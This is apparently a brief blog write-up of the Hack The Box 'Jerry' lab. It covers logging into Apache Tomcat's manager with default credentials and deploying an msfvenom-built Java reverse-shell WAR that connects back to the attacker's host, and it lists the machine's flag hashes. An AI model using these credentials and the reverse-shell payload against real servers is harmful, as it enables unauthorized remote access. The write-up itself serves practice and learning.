Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Jerry Windows

Published on 21 Nov 2018

Easy machine, you will learn about Apache Tomcat exploitation and .war shells!

Recon

Apache Tomcat is running on port:8080. Clicking on the manager app pops up the admin login page. Credentials are needed for admin

After some google search we find the default creds for Apache Tomcat. admin:s3cret We login into the admin page.

Doing some enumaration on the app reveals that we can upload files .WAR

So we create a reverse shell using msfvenom and deployed on tomcat

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.14
LPORT=9999 -f war > evil.war 

we use metasploit and set up use exploit/multi/handler . We collect the flags as we have a shell we elevated privileges.

USER "7004dbcef0f854e0fb401875f26ebd00"
ROOT "04a8b36e1545a455393d067e772fe90e"